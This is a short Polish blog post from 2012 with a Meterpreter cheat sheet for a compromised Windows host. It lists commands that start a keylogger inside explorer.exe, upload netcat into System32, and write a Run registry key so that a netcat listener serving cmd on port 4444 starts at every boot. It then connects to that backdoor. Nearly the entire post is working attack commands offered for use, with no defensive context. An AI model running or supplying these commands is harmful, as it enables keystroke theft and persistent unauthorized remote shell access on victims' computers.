środa, 28 marca 2012

meterpreter keyloger and upload backdoor

keyloger i netcat
Komendy:
KEYLOGER
migrate (pid explorer.exe)
keyscan_start
keyscan_dump(opcjonalnie cala siec)
keyscan_stop
UPLOAD BACKDORS nc.exe
cd /pentest/windows-binaries/tools/
cp nc.exe /root/Desktop/(opcjonalnie)
upload /root/nc.exe C:\\WINDOWS\\SYSTEM32 dla win 7 ustawiamy przywileje
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v test -d 'C:\WINDOWS\SYSTEM32\nc.exe -L -d -p 4444 -e cmd'
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(opcjonalnie sprawdzamy czy wszystko jest ok
nc ip_hosta port
GAME OVER

Brak komentarzy:

Prześlij komentarz